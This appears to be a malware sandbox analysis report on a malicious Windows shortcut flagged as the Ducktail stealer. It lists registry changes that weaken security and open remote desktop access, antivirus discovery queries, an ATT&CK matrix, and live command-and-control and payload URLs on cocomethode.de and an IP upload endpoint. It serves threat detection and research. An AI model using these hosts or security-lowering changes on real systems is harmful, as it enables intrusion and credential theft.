Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation

Source: C:\Windows\Temp\svczHost.exe

Code function: 20_2_00007FF7993BBFE0 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

20_2_00007FF7993BBFE0

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings

Modifies security policies related information

Source: C:\Windows\Temp\myRdpService.exe

Registry key created or modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa DisableRestrictedAdmin

Source: powershell.exe, 00000003.00000002.3756553973.000001F3FBEB8000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.3759182674.000001F3FBFAA000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.3756553973.000001F3FBED8000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.3756553973.000001F3FBEA9000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.4429804587.000002A49A948000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: powershell.exe, 0000000D.00000002.4478107120.000002A49AA24000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ramFiles%\Windows Defender\MsMpeng.exe

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - Root\SecurityCenter2 : select * from AntivirusProduct
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - Root\SecurityCenter2 : select * from AntivirusProduct

Stealing of Sensitive Information

Yara detected Ducktail

Source: Yara match	File source: Process Memory Space: svczHost.exe PID: 6444, type: MEMORYSTR
Source: Yara match	File source: amsi64_8952.amsi.csv, type: OTHER
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 1804, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 8952, type: MEMORYSTR

Remote Access Functionality

Yara detected Ducktail

Source: Yara match	File source: Process Memory Space: svczHost.exe PID: 6444, type: MEMORYSTR
Source: Yara match	File source: amsi64_8952.amsi.csv, type: OTHER
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 1804, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 8952, type: MEMORYSTR

Allows multiple concurrent remote connection

Source: C:\Windows\Temp\myRdpService.exe

Registry key created or modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Terminal Server fSingleSessionPerUser

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	431 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	1 Disable or Modify Tools	OS Credential Dumping	1 System Time Discovery	1 Remote Desktop Protocol	1 Archive Collected Data	1 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	2 Command and Scripting Interpreter	11 Windows Service	11 Windows Service	1 Deobfuscate/Decode Files or Information	LSASS Memory	1 File and Directory Discovery	Remote Desktop Protocol	Data from Removable Media	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 Service Execution	Logon Script (Windows)	11 Process Injection	1 Obfuscated Files or Information	Security Account Manager	126 System Information Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	11 Non-Standard Port	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	5 PowerShell	Login Hook	Login Hook	1 Software Packing	NTDS	441 Security Software Discovery	Distributed Component Object Model	Input Capture	3 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	11 Process Discovery	SSH	Keylogging	14 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 File Deletion	Cached Domain Credentials	351 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	13 Masquerading	DCSync	1 Application Window Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 Modify Registry	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	351 Virtualization/Sandbox Evasion	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	11 Process Injection	Network Sniffing	Network Service Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
0A3NB8ot11.lnk	30%	Virustotal		Browse
0A3NB8ot11.lnk	32%	ReversingLabs	Shortcut.Trojan.Pantera

Source	Detection	Scanner	Label
https://cocomethode.de	100%	Avira URL Cloud	malware
https://cocomethode.de/file2/2f50eec7b7fe989c3602e42fe12e09ebb032005a9f9172a762eaeaff41257fe78168796	100%	Avira URL Cloud	malware
http://html4/loose.dtd	0%	Avira URL Cloud	safe
https://cocomethode.de/file2/30bb492ec87899a2b4a8fa5c9eeec469c195e0b8ed0d1a330469aa0c9479e74ac1d07aa2b8fd57cf5f0bd3f24c68ed185d64a9ac7de4983fe5e3122fca7943699695f922096bc194352a7f8167d0f40a86605fb5fcbc94e2f07cb01d75a37ad6	100%	Avira URL Cloud	malware
https://cocomethode.de/OKNf	100%	Avira URL Cloud	malware
https://cocomethode.de/StaticFile/RdpService/87ice	100%	Avira URL Cloud	malware
http://www.microsoft.co	0%	Avira URL Cloud	safe
https://go.microsoft.co	0%	Avira URL Cloud	safe
https://cocomethode.de/file2/d51c3dcb853d6c497196480b03dbc640248fcef44df66b5a162e2d46de68ca13d57f766	100%	Avira URL Cloud	malware
https://cocomethode.de/file2/442d6d2bbbf95a0c2d98335c7cf12d9d4a2163bfd33f42547d8e2176349fc5bec999df7	100%	Avira URL Cloud	malware
http://.css	0%	Avira URL Cloud	safe
https://cocomethode.de/609aafcaa17aae4dc51ce49a2e84612a74368b57fc4b8bec450f6e5cff9596ba1bb64a5e2edd07efb8ae519f91549752	100%	Avira URL Cloud	malware
https://cocomethode.de/file2/961e923217e6366fedc4ef058b135504177a85e5d4a3d3fefcd20dd6a4bae06bcd34fb5dbb1a738ebd5d59c383ddda7ae733b974b62b8e600a867205fe86acb615bbb394f676a9487f0a6d13dbf465585b805cd5c966e21c3b43adfc54fca65e29f108cd32057c0ab0de90b77ba7bdfc	100%	Avira URL Cloud	malware
https://cocomethode.de/609aafcaa17aae4dc51ce49a2e84612a74368b57fc4b8bec450f6e5cff9596ba5594b7f8efa9d5a67dc965e450f19373	100%	Avira URL Cloud	malware
https://cocomethode.de/StaticFile/RdpService/87	100%	Avira URL Cloud	malware
http://cocomethode.de	100%	Avira URL Cloud	malware
https://cocomethode.de/file2/30bb492ec87899a2b4a8fa5c9eeec469c195e0b8ed0d1a330469aa0c9479e74ac1d07aa	100%	Avira URL Cloud	malware
http://crl.microsoft.co	0%	Avira URL Cloud	safe
https://ocsp.quovadisoffshore.com0	0%	Avira URL Cloud	safe
https://cocomethode.de/file3/b83fe30fc85331b12cce94a54c8621c65eea6b03791942cceb80937bd723c6b18fd123c1f55782c1aa93f7ccdfccb20f78866afc8074889dd125916882b0ad29e2f1b013f9f235865a5d8e4be95dccfbcf72fc95b375ca83c0d95f43fa19f849/Windows%20Defender/16/16/user/206	100%	Avira URL Cloud	malware
http://pesterbdd.com/images/Pester.pngXzT	0%	Avira URL Cloud	safe
http://23.88.71.29:8000/api/registry	0%	Avira URL Cloud	safe
http://.jpg	0%	Avira URL Cloud	safe
https://go.micro	0%	Avira URL Cloud	safe
http://pesterbdd.com/images/Pester.png	0%	Avira URL Cloud	safe
https://cocomethode.de/file2/442d6d2bbbf95a0c2d98335c7cf12d9d4a2163bfd33f42547d8e2176349fc5bec999df77ed6fc10cd2b8f1bf6e1419afd1b8e652d60820a56f5d872b9832d58cfe65348bdb616db23e43f7972daf391f13bd6a69c891902807aad423627811c8e0d4aa7ee939d745201eed806ee979fa	100%	Avira URL Cloud	malware
https://cocomethode.de/609aafcaa17aae4dc51ce49a2e84612a74368b57fc4b8bec450f6e5cff9596ba5594b7f8efa9d	100%	Avira URL Cloud	malware
https://cocomethode.de/file2/961e923217e6366fedc4ef058b135504177a85e5d4a3d3fefcd20dd6a4bae06bcd34fb5	100%	Avira URL Cloud	malware
http://www.microsoft.c9	0%	Avira URL Cloud	safe
http://pesterbdd.com/images/Pester.pngh	0%	Avira URL Cloud	safe
https://cocomethode.de/file2/2f50eec7b7fe989c3602e42fe12e09ebb032005a9f9172a762eaeaff41257fe78168796832c4fd288b62c8ec411566a8647c0dcf0e876594e63eefc32abbe62cf7e16991160bf42ec5699a35966baaa81d918ee8e0cfd67495b55d4aa2a39a45e1d3f3bae765c97e7ceb82114cdc97d1	100%	Avira URL Cloud	malware
https://cocomethode.de/StaticFile/TermServiceTryRun/12	100%	Avira URL Cloud	malware
https://cocomethode.de/file2/7fd1a89d0020dcffe37c334092d29597499af8b82a4f37fb75f7f3a0a1257f1e979bdbe	100%	Avira URL Cloud	malware
https://cocomethode.de/609aafcaa17aae4dc51ce49a2e84612a74368b57fc4b8bec450f6e5cff9596ba1bb64a5e2edd0	100%	Avira URL Cloud	malware
https://cocomethode.de/609aafcaa17aae4dc51ce49a2e84612a74368b57fc4b8bec450f6e5cff9596ba62b7a16313e7aa5a86667fb98ddb1b83	100%	Avira URL Cloud	malware
http://23.88.71.29:8000/client/ws	0%	Avira URL Cloud	safe
http://crl.mi	0%	Avira URL Cloud	safe
http://cocomethode.de:443/	100%	Avira URL Cloud	malware
https://cocomethode.de/609aafcaa17aae4dc51ce49a2e84612a74368b57fc4b8bec450f6e5cff9596ba96371e053b9048f0e3e116858dfb6bb0	100%	Avira URL Cloud	malware
https://cocomethode.de/609aafcaa17aae4dc51ce49a2e84612a74368b57fc4b8bec450f6e5cff9596ba62b7a16313e7a	100%	Avira URL Cloud	malware
https://cocomethode.de/file3/b83fe30fc85331b12cce94a54c8621c65eea6b03791942cceb80937bd723c6b18fd123c	100%	Avira URL Cloud	malware
http://www.quovadis.bm0	0%	Avira URL Cloud	safe
http://crl.microsoft.c7	0%	Avira URL Cloud	safe
https://cocomethode.de/file2/d51c3dcb853d6c497196480b03dbc640248fcef44df66b5a162e2d46de68ca13d57f766867e1712c1111f93d41207e9a66b4c79a2a22a8f3f977554b38c2c12b8d6d0f874d5d28de666900008551a5a74884807c221f677dd119de8925270a5159b4d5954723b3d86ef67de15dc0d9b5	100%	Avira URL Cloud	malware
http://cocomethode.de/api/check	100%	Avira URL Cloud	malware
https://oneget.org	0%	Avira URL Cloud	safe
http://23.88.71.29:8000/api/registry/upload/29b7a8f8d9967ca4c3166269aa4de757	0%	Avira URL Cloud	safe
https://cocomethode.de/609aafcaa17aae4dc51ce49a2e84612a74368b57fc4b8bec450f6e5cff9596ba96371e053b904	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
cocomethode.de	104.21.1.51	true	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://cocomethode.de/OKNf	false	Avira URL Cloud: malware	unknown
https://cocomethode.de/file2/30bb492ec87899a2b4a8fa5c9eeec469c195e0b8ed0d1a330469aa0c9479e74ac1d07aa2b8fd57cf5f0bd3f24c68ed185d64a9ac7de4983fe5e3122fca7943699695f922096bc194352a7f8167d0f40a86605fb5fcbc94e2f07cb01d75a37ad6	false	Avira URL Cloud: malware	unknown
https://cocomethode.de/609aafcaa17aae4dc51ce49a2e84612a74368b57fc4b8bec450f6e5cff9596ba1bb64a5e2edd07efb8ae519f91549752	false	Avira URL Cloud: malware	unknown
https://cocomethode.de/609aafcaa17aae4dc51ce49a2e84612a74368b57fc4b8bec450f6e5cff9596ba5594b7f8efa9d5a67dc965e450f19373	false	Avira URL Cloud: malware	unknown
https://cocomethode.de/StaticFile/RdpService/87	false	Avira URL Cloud: malware	unknown
https://cocomethode.de/file3/b83fe30fc85331b12cce94a54c8621c65eea6b03791942cceb80937bd723c6b18fd123c1f55782c1aa93f7ccdfccb20f78866afc8074889dd125916882b0ad29e2f1b013f9f235865a5d8e4be95dccfbcf72fc95b375ca83c0d95f43fa19f849/Windows%20Defender/16/16/user/206	false	Avira URL Cloud: malware	unknown
https://cocomethode.de/file2/961e923217e6366fedc4ef058b135504177a85e5d4a3d3fefcd20dd6a4bae06bcd34fb5dbb1a738ebd5d59c383ddda7ae733b974b62b8e600a867205fe86acb615bbb394f676a9487f0a6d13dbf465585b805cd5c966e21c3b43adfc54fca65e29f108cd32057c0ab0de90b77ba7bdfc	false	Avira URL Cloud: malware	unknown
http://23.88.71.29:8000/api/registry	false	Avira URL Cloud: safe	unknown
https://cocomethode.de/file2/442d6d2bbbf95a0c2d98335c7cf12d9d4a2163bfd33f42547d8e2176349fc5bec999df77ed6fc10cd2b8f1bf6e1419afd1b8e652d60820a56f5d872b9832d58cfe65348bdb616db23e43f7972daf391f13bd6a69c891902807aad423627811c8e0d4aa7ee939d745201eed806ee979fa	false	Avira URL Cloud: malware	unknown
https://cocomethode.de/file2/2f50eec7b7fe989c3602e42fe12e09ebb032005a9f9172a762eaeaff41257fe78168796832c4fd288b62c8ec411566a8647c0dcf0e876594e63eefc32abbe62cf7e16991160bf42ec5699a35966baaa81d918ee8e0cfd67495b55d4aa2a39a45e1d3f3bae765c97e7ceb82114cdc97d1	false	Avira URL Cloud: malware	unknown
https://cocomethode.de/StaticFile/TermServiceTryRun/12	false	Avira URL Cloud: malware	unknown
https://cocomethode.de/609aafcaa17aae4dc51ce49a2e84612a74368b57fc4b8bec450f6e5cff9596ba62b7a16313e7aa5a86667fb98ddb1b83	false	Avira URL Cloud: malware	unknown
http://23.88.71.29:8000/client/ws	false	Avira URL Cloud: safe	unknown
https://cocomethode.de/609aafcaa17aae4dc51ce49a2e84612a74368b57fc4b8bec450f6e5cff9596ba96371e053b9048f0e3e116858dfb6bb0	false	Avira URL Cloud: malware	unknown
http://cocomethode.de/api/check	false	Avira URL Cloud: malware	unknown
https://cocomethode.de/file2/d51c3dcb853d6c497196480b03dbc640248fcef44df66b5a162e2d46de68ca13d57f766867e1712c1111f93d41207e9a66b4c79a2a22a8f3f977554b38c2c12b8d6d0f874d5d28de666900008551a5a74884807c221f677dd119de8925270a5159b4d5954723b3d86ef67de15dc0d9b5	false	Avira URL Cloud: malware	unknown
http://23.88.71.29:8000/api/registry/upload/29b7a8f8d9967ca4c3166269aa4de757	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://html4/loose.dtd	powershell.exe, 0000000D.00000002.4350731384.000002A492E29000.00000004.00000800.00020000.00000000.sdmp, svczHost.exe, 00000014.00000002.4765894682.00007FF799A0B000.00000002.00000001.01000000.00000009.sdmp, svczHost.exe, 00000014.00000002.4757589094.000001B903346000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cocomethode.de/StaticFile/RdpService/87ice	svczHost.exe, 00000014.00000002.4755964850.000001B90208F000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://go.microsoft.co	powershell.exe, 00000002.00000002.3490034644.0000020C7FAF5000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://aka.ms/nativeaot-c	svczHost.exe, myRdpService.exe	false		high
https://cocomethode.de	powershell.exe, 00000003.00000002.3702779169.000001F38022C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.3597293545.000001B580C5D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.3597293545.000001B5805CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.3932623749.000002A482904000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.3932623749.000002A483D5E000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://cocomethode.de/file2/442d6d2bbbf95a0c2d98335c7cf12d9d4a2163bfd33f42547d8e2176349fc5bec999df7	powershell.exe, 0000000D.00000002.3932623749.000002A482581000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.3932623749.000002A4827AC000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.microsoft.co	powershell.exe, 00000003.00000002.3761350749.000001FBFD102000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://contoso.com/License	powershell.exe, 00000018.00000002.4144913601.0000016690074000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cocomethode.de/file2/2f50eec7b7fe989c3602e42fe12e09ebb032005a9f9172a762eaeaff41257fe78168796	powershell.exe, 00000003.00000002.3702779169.000001F3803F6000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://cocomethode.de/file2/d51c3dcb853d6c497196480b03dbc640248fcef44df66b5a162e2d46de68ca13d57f766	powershell.exe, 00000003.00000002.3702779169.000001F3803F6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.3702779169.000001F380690000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://github.com/Pester/PesterXzT	powershell.exe, 00000002.00000002.3472549645.0000020C67BDC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.3702779169.000001F38022C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.3597293545.000001B58026A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.3943366985.000001668022C000.00000004.00000800.00020000.00000000.sdmp	false		high
http://.css	powershell.exe, 0000000D.00000002.4350731384.000002A492E29000.00000004.00000800.00020000.00000000.sdmp, svczHost.exe, 00000014.00000002.4765894682.00007FF799A0B000.00000002.00000001.01000000.00000009.sdmp, svczHost.exe, 00000014.00000002.4757589094.000001B903346000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://cocomethode.de	powershell.exe, 00000008.00000002.3597293545.000001B580C96000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://github.com/dotnet/runtime	powershell.exe, 0000000D.00000002.4350731384.000002A492626000.00000004.00000800.00020000.00000000.sdmp, svczHost.exe, 00000014.00000002.4757589094.000001B902A48000.00000004.00001000.00020000.00000000.sdmp, svczHost.exe, 00000014.00000002.4765894682.00007FF7998F2000.00000002.00000001.01000000.00000009.sdmp, svczHost.exe, 00000014.00000000.3911058109.00007FF7998F2000.00000002.00000001.01000000.00000009.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/denyonlysidY	powershell.exe, 0000000D.00000002.4350731384.000002A492E29000.00000004.00000800.00020000.00000000.sdmp, svczHost.exe, 00000014.00000002.4765894682.00007FF799A0B000.00000002.00000001.01000000.00000009.sdmp, svczHost.exe, 00000014.00000002.4757589094.000001B903346000.00000004.00001000.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/denyonlysid	svczHost.exe, svczHost.exe, 00000014.00000002.4765472868.00007FF799780000.00000004.00000001.01000000.00000009.sdmp, myRdpService.exe	false		high
https://aka.ms/dotnet-warnings/	powershell.exe, 0000000D.00000002.4350731384.000002A492E29000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.4350731384.000002A492626000.00000004.00000800.00020000.00000000.sdmp, svczHost.exe, svczHost.exe, 00000014.00000002.4765894682.00007FF799A0B000.00000002.00000001.01000000.00000009.sdmp, svczHost.exe, 00000014.00000002.4757589094.000001B903346000.00000004.00001000.00020000.00000000.sdmp, svczHost.exe, 00000014.00000002.4757589094.000001B902A48000.00000004.00001000.00020000.00000000.sdmp, svczHost.exe, 00000014.00000002.4765472868.00007FF799780000.00000004.00000001.01000000.00000009.sdmp, svczHost.exe, 00000014.00000002.4765894682.00007FF7998F2000.00000002.00000001.01000000.00000009.sdmp, svczHost.exe, 00000014.00000000.3911058109.00007FF7998F2000.00000002.00000001.01000000.00000009.sdmp, myRdpService.exe	false		high
http://crl.microsoft.co	powershell.exe, 00000003.00000002.3761123392.000001FBFD0E0000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://aka.ms/nativeaot-compatibility	myRdpService.exe	false		high
https://contoso.com/	powershell.exe, 00000018.00000002.4144913601.0000016690074000.00000004.00000800.00020000.00000000.sdmp	false		high
https://nuget.org/nuget.exe	powershell.exe, 00000002.00000002.3472549645.0000020C68EA2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.3487490878.0000020C77A34000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.3487490878.0000020C77B6A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.3742325021.000001F390078000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.3633648179.000001B590079000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.3597293545.000001B58164A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.4144913601.00000166901B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.3943366985.00000166814F6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.4144913601.0000016690074000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cocomethode.de/file2/30bb492ec87899a2b4a8fa5c9eeec469c195e0b8ed0d1a330469aa0c9479e74ac1d07aa	powershell.exe, 0000000D.00000002.3932623749.000002A482942000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://ocsp.quovadisoffshore.com0	powershell.exe, 00000002.00000002.3490034644.0000020C7FA90000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.3752962645.000001F3FBAB4000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.3642064416.000001B5FCBF8000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.4419408500.000002A49A5E9000.00000004.00000020.00020000.00000000.sdmp, svczHost.exe, 00000014.00000002.4754714057.000001B8FEF3E000.00000004.00000020.00020000.00000000.sdmp, svczHost.exe, 00000014.00000003.4296169846.000001B8FEF7E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000002.00000002.3472549645.0000020C679B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.3702779169.000001F380001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.3597293545.000001B580001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.4350731384.000002A492E29000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.3932623749.000002A482581000.00000004.00000800.00020000.00000000.sdmp, svczHost.exe, svczHost.exe, 00000014.00000002.4765894682.00007FF799A0B000.00000002.00000001.01000000.00000009.sdmp, svczHost.exe, 00000014.00000002.4757589094.000001B903346000.00000004.00001000.00020000.00000000.sdmp, svczHost.exe, 00000014.00000002.4765472868.00007FF799780000.00000004.00000001.01000000.00000009.sdmp, powershell.exe, 00000018.00000002.3943366985.0000016680001000.00000004.00000800.00020000.00000000.sdmp, myRdpService.exe	false		high
http://.jpg	powershell.exe, 0000000D.00000002.4350731384.000002A492E29000.00000004.00000800.00020000.00000000.sdmp, svczHost.exe, 00000014.00000002.4765894682.00007FF799A0B000.00000002.00000001.01000000.00000009.sdmp, svczHost.exe, 00000014.00000002.4757589094.000001B903346000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://pesterbdd.com/images/Pester.pngXzT	powershell.exe, 00000002.00000002.3472549645.0000020C67BDC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.3702779169.000001F38022C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.3597293545.000001B58026A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.3943366985.000001668022C000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
